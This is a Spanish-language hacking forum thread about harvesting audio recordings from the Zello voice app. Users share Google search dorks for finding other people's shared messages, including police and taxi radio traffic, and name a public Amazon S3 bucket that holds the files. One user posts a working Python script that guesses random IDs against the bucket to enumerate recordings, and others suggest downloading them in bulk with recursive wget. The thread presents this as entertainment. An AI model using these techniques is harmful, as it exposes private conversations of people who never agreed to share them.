Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

El caso de la red Zello o como intervenir comunicaciones en red social

  • 6 Respuestas
  • 2472 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 220
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
« en: Julio 11, 2018, 05:02:05 am »
Hola gente hoy les voy a hablar de una red social como whatsapp o telegram, pero es por audio o videoconferencia...

Aqui les mando el link de esta red que presume tener 120 millones de usuarios xD. Link project:

https://zello.com



Lo que mola con esta red es que es totalmente insegura y uno puede encontrarse con video conferencias y audios de todo tipo, sin mas haciendo "hacking con buscadores" con google.

Dork PoC: site:zello.com/shared

68.000 audios y charlas de todo tipo, pero filtremos...

site:zello.com/shared/ policia

78 resultados entre ellos...


https://zello.com/shared/ahvab

O

https://zello.com/shared/ADnfb

PoC Taxis:

site:zello.com/shared taxy

14000 resultados...

Algunos como:

https://zello.com/shared/xoTeb

Espero que se entretengan y sed buenos!.
Saludos Rootkit_Pentester.

"Dame un buscador y movere el mundo".


Desconectado Tatoluckyfox

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Julio 11, 2018, 06:10:40 am »
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citar
http://zello.me/get/<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 220
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
« Respuesta #2 en: Julio 11, 2018, 08:00:00 am »
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citar
http://zello.me/get/<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @Tatoluckyfox, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

Conectado DtxdF

  • *
  • Moderador
  • Mensajes: 324
  • Actividad:
    41.67%
  • Reputación 5
  • Fácil manipular + No es fácil manipularse
    • Ver Perfil
    • Transfi: Un sistema de almacenamiento en Herramientas de seguridad informática alojadas en mi repositorio
« Respuesta #3 en: Julio 11, 2018, 09:20:01 am »
@Rootkit_Pentester

Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

Citar
http://zello.me/get/<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @Tatoluckyfox, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

se puede usar wget de forma recursiva
- Gobiernos: Personas desoladas de la inteligencia

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 220
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
« Respuesta #4 en: Julio 11, 2018, 10:44:03 am »
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF @Tatoluckyfox

Los mp3 no vienen de: zello.me sino de un bucket de Amazon   ;D

Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
 Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.

Saludos colegas :D
« Última modificación: Julio 11, 2018, 10:47:29 am por Rootkit_Pentester »

Desconectado Tatoluckyfox

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Julio 11, 2018, 05:17:14 pm »
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF @Tatoluckyfox

Los mp3 no vienen de: zello.me sino de un bucket de Amazon   ;D

Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
 Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.

Saludos colegas :D

Exacto.
Funciona de una manera muy simple:

           https://s3.amazonaws.com/zello.sharedmessages/<id>

Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.


Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
Código: Python
  1. import requests
  2. import random
  3.  
  4. def random_string():
  5.  
  6.         return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])
  7.  
  8. for x in range(500):
  9.  
  10.         a = random_string()
  11.         req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
  12.         if req.status_code == 200:
  13.  
  14.                 print a + " existe.           - - - - - - - - - - - - -"
  15.  
  16.         else:
  17.  
  18.                 print a + " no existe. -> " + str(req.status_code)

Y funciona tal que así.

Desconectado Rootkit_Pentester

  • *
  • Underc0der
  • Mensajes: 220
  • Actividad:
    0%
  • Reputación 8
    • Ver Perfil
    • Email
« Respuesta #6 en: Julio 11, 2018, 07:00:30 pm »
Grande capo @Tatoluckyfox te felicito por el script, creo que te lo voy a robar para usarlo como fuzzer!.
Saludos! ;).

 

¿Te gustó el post? COMPARTILO!



Como usar Google DoSear contra sitios web alojados en grandes dominios

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 2963
Último mensaje Mayo 04, 2012, 12:12:50 am
por Cronos
¿Cómo eché a la gente de mi red WiFi para aumentar mi velocidad de internet?

Iniciado por puntoCL

Respuestas: 0
Vistas: 193
Último mensaje Julio 16, 2019, 06:44:50 pm
por puntoCL
[GUIA]Como protegerse del doxing y proteger tu informacion personal en telegram

Iniciado por Psico

Respuestas: 5
Vistas: 939
Último mensaje Julio 07, 2019, 07:05:50 am
por hielasangre
Como tomar control de un dispositivo Android en menos de 1 minuto

Iniciado por ANTRAX

Respuestas: 24
Vistas: 22404
Último mensaje Junio 29, 2019, 10:40:59 pm
por Psico
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 3
Vistas: 4418
Último mensaje Octubre 01, 2018, 03:05:53 pm
por Kyxda